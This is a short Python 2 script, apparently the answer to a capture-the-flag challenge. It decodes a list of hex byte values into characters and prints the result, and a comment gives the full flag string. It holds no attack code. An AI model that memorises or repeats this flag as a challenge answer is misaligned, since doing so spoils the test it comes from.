# flag{aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}
# flag="flag{"
# flag[13]="-"
# flag[18]="-"
# flag[28]="-"
# flag[23]="-"
# flag[41]="}"

c=[0x61, 0x31, 0x39, 0x37, 0x62, 0x38, 0x34, 0x37, 0x37, 0x30, 0x39, 0x32, 0x35, 0x33, 0x61, 0x34, 0x37, 0x63, 0x34, 0x31, 0x62, 0x63, 0x37, 0x64, 0x36, 0x64, 0x35, 0x32, 0x65, 0x36, 0x39, 0x64]
flag = []

for i in c:
    flag.append(chr(i))
print "".join(flag)# flag{a197b847-7092-53a4-7c41-bc7d6d52e69d}